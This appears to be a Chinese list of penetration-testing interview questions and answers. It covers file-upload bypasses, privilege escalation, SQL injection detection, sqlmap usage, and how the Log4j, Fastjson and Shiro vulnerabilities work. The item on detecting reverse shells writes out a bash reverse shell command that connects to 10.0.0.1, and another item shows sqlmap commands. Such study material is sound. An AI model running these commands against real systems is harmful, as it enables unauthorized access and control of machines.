1、怎么加快盲注速度?
二分法和DNSlog外带测试
2、你说一下文件上传的绕过方式
*禁用前端js验证
*更改mime类型
*%00、0x00截断
*.htaccess、.user.ini.绕过
*文件扩展名绕过
*图片马绕过
3、反弹shel
反弹shell就是靶机将shell反弹给攻击者,从而达到让攻击者可以在靶机上执行shell命令,从而控制靶机
4、对护网红蓝对抗的理解
护网的红蓝对抗一般分为3个队伍:蓝队、红队和紫队,蓝队是防守方、红队是攻击方、紫队相当于裁判队
蓝队:不对用户造成太多限制的情况下,发现可被利用的漏洞,保护自己的领域
红队:用各种手段进行攻击
5、渗透测试流程
信息收集:
1、获取域名whois信息
2、服务器子域名、旁站、c段查询
3、服务器操作系统版本补丁状况、web中间件类型、版本、数据库类型等
4、服务器开放端口:22 ssh 80 web 445 3389.。
漏洞扫描:
nessus,awvs ,appscan
漏洞验证:
是否存在漏洞,是否可以拿到webshell或者其他权限
权限提升:
windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权
linux内核漏洞提权、sudoer配置文件错误提权、SUID、SUDO
横向渗透
日志清理
6、内网渗透
*内网信息收集
*漏洞探测
*漏洞利用
*权限提升
*权限维持
7、windows、linux提权
windows提权:内核溢出提权,数据库提权、web中间件提权、系统错误配置漏洞提权
linux提权:内核漏洞提权、sudoer配置文件错误提权、SUDO、SUID提权
8、SQL注入的流量特征
1.参数长度异常:攻击者通常会在SQL注入攻击中使用长参数来尝试构建恶意语句,因此在网络流量中需要寻找异常长度的参数。
2.非法字符:攻击者通常使用非法字符来构建恶意SQL语句,如单引号、分号等。
3.异常请求:攻击者可能会在HTTP请求中包含多个语句或查询,或者在HTTP请求中包含错误或缺失的参数。
4.错误响应:如果应用程序未正确处理SQL注入攻击,则可能会返回错误响应。攻击者可以通过分析响应以查找此类错误,并尝试进一步攻击。
5.非常规流量:攻击者可能会在较短时间内发送大量请求,或在同一时间窗口内多次发送相同请求。这种非常规流量模式可能表明攻击正在进行中。
9、sqlmap如何post发起请求
*sqlmap -u xxxxx --data "user=1&password=2" --random-agent
*用burpsuite抓取post请求包,保存到txt文件中,sqlmap -r 123.txt
10、登陆注册框页面可以测试哪些漏洞
1、弱口令
2、sql注入
3、暴力破解
4、验证码绕过
5、目录扫描工具
6、js敏感信息泄露
11、排查反弹shell
明确反弹shell写法: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
1、登录服务器查看命令:ps -ef,过滤出反弹shell的进程
2、定位进程启动路径,命令:pwdx pid
3、进入启动路径,确认启动的服务是否正常,命令:cd *
4、定位可疑文件,并删除。命令:rm
5、停止进程shell进程,命令:kill -9 pid
14.常见的框架漏洞?
答;
log4j远程代码执行漏洞
原理: Log4j 是Apache 的一个开源项目,是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`${`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。 具体操作: 在正常的log处理过程中对**${**这两个紧邻的字符做了检测,一旦匹配到类似于表达式结构的字符串就会触发替换机制,将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行
Fastjson反序列化漏洞
判断: 正常请求是get请求并且没有请求体,可以通过构造错误的POST请求,即可查看在返回包中是否有fastjson这个字符串来判断。 原理: fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。 无回显怎么办: 1.一种是直接将命令执行结果写入到静态资源文件里,如html、js等,然后通过http访问就可以直接看到结果 2.通过dnslog进行数据外带,但如果无法执行dns请求就无法验证了 3.直接将命令执行结果回显到请求Poc的HTTP响应中
Shiro反序列化漏洞
原理: Shiro是Apache下的一个开源Java安全框架,执行身份认证,授权,密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项,那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求,就不需要重新输入用户名和密码。 判断: 1.数据返回包中包含rememberMe=deleteMe字段。 2.直接发送原数据包,返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段:****rememberMe=然后查看返回数据包中是否存在关键字。 shiro-550: shiro反序列化漏洞利用有两个关键点,首先是在shiro<1.2.4时,AES加密的密钥Key被硬编码在代码里,只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法,readObject用来执行反序列化后需要执行的代码片段,从而造成恶意命令可以被执行。攻击者构造恶意代码,并且序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码,解密并且反序列化,最终造成反序列化漏洞。 shiro-721: 不需要key,利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。
13、常见中间件漏洞
(一) IIS
解析漏洞
(二) Apache
解析漏洞
目录遍历
(三) Nginx
文件解析
目录穿越
(四)Tomcat
1、任意文件上传
2、未授权弱口令+war后门文件部署
(五)jBoss
1、反序列化漏洞
2、war后门文件部署
(六)WebLogic
1、反序列化漏洞
3、任意文件上传
4、war后门文件部署
xss 有 cookie 一定可以无用户名密码登录吗?
基本可以。因为把 cookie 的值给浏览器,浏览器去访问页面会用已有的cookie 去访问,如果 cookie 有效,就会直接进去。